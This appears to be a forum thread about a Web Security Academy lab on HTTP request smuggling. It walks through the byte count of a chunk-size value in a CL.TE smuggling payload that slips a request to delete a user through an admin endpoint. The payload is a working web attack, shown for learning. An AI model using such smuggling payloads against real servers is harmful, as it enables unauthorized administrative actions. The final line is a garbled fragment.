I'm not getting that in Transfer-Encoding: chunked, how the size is counted. can anyone explain this chunk size please? thank you.
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
When studying about http request smuggling, I struggle too in working out how the chunk size is counted. I've found the example from wikipedia to be very helpful ( https://en.wikipedia.org/wiki/Chunked_transfer_encoding#Example).
So let me try to help you out here, as this is actually a good exercise for me too.
87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
87 there is in hex form. In decimal form, its 135. Thus the chunks size is 135 bytes.
Then, for every line below 87 we count every characters (assuming 1 character equals 1 byte) and then add 2 bytes for CRLF (\r\n), except for the last line above 0 which we don't need to count the trailing CRLF.
Thus it goes something like this:
GET /admin/delete?username=carlos HTTP/1.1 -> 42 + 2 bytes for \r\n = 44 bytes
Host: localhost -> 15 + 2 = 17 bytes
Content-Type: application/x-www-form-urlencoded -> 47 + 2 = 49 bytes
Content-Length: 15 -> 18 + 2 -> 20 bytes
-> 0 + 2 = 2 bytes
x=1 -> 3 bytes
Thus in total there are 135 bytes of chunked data.
Hope this could help.
Transfer-encoding: chunkedthere, not 15 bytes of data... What's that87at the start..?Content-lengthheader, then your chunk header says "here's 87 bytes in this chunk".